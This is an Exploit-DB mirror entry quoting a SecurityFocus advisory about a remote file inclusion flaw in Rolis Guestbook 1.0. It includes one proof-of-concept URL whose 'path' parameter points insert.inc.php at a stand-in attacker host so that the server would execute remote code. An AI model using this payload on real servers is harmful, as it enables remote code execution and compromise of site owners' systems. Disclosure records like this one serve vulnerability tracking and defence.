exploit-db-mirror/platforms/php/webapps/23384.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

7 lines
No EOL
468 B
Text
Executable file

source: http://www.securityfocus.com/bid/9054/info
It has been reported that Rolis Guestbook may be vulnerable to an input validation issue that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system.
Rolis Guestbook version 1.0 has been reported to be prone to this issue, however other versions may be affected as well.
http://www.example.com/rolis_book_path/insert.inc.php?path=http://hacker.com/